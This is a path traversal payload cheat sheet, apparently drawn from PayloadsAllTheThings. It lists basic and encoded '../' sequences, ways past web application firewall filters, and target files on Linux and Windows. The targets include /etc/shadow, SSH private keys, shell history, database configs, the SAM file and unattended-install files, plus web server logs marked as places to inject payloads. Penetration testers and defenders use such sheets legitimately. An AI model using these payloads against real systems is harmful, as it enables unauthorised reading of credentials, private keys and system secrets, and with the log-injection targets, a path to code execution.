Path Traversal

Basic Payloads

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216

Bypasses

# If WAF removing "../"
..././
...\.\
..;/

# Double URL encoding
. = %252e
/ = %252f
\ = %255c

Interesting Files

Linux

Interesting files:

• Operating System and Informations

  /etc/issue
  /etc/group
  /etc/hosts
  /etc/motd

• Processes

  /proc/[0-9]*/fd/[0-9]*   # first number is the PID, second is the filedescriptor
  /proc/self/environ
  /proc/version
  /proc/cmdline
  /proc/sched_debug
  /proc/mounts

• Network

  /proc/net/arp
  /proc/net/route
  /proc/net/tcp
  /proc/net/udp

• Current Path

  /proc/self/cwd/index.php
  /proc/self/cwd/main.py

• Indexing

  /var/lib/mlocate/mlocate.db
  /var/lib/plocate/plocate.db
  /var/lib/mlocate.db

• Credentials and history

  /etc/passwd
  /etc/shadow
  /home/$USER/.bash_history
  /home/$USER/.ssh/id_rsa
  /etc/mysql/my.cnf

• Possible payload injectable files:

  /var/log/apache/access.log
  /var/log/apache/error.log
  /var/log/httpd/error_log
  /usr/local/apache/log/error_log
  /usr/local/apache2/log/error_log
  /var/log/nginx/access.log
  /var/log/nginx/error.log
  /var/log/vsftpd.log
  /var/log/sshd.log
  /var/log/mail

Windows

Interesting files:

# Always existing files in recent Windows
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
C:\Windows\win.ini

c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal